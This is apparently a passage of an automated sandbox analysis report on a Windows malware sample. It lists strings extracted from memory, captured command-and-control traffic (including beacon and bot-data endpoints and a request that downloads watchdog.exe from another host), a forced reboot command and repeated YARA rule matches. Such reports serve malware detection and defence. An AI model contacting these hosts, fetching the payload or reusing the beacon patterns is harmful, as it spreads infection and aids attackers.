Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.com
Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:
Source: csrss.exe String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://retoti.com
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com
Source: csrss.exe, 0000000E.00000003.379435337.00000000168F0000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/api/pollf
Source: csrss.exe, 0000000E.00000002.558133841.00000000169C0000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378575314.00000000169C0000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://sitescore.aiValue
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: csrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://trumops.com
Source: csrss.exe String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: 4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.com
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
Source: unknown HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: trumops.com
Source: global traffic HTTP traffic detected: GET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1Host: server8.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: f7873597-7b36-4441-9416-097456f134aeVersion: 183Accept-Encoding: gzip

System Summary:

barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Uses 32bit PE files
Source: 4t4y4r89UZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.655bce0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e2bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55e4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e99a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e29a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e240e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.5574f30.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.557a8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e9bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e940e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55ea8d0.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
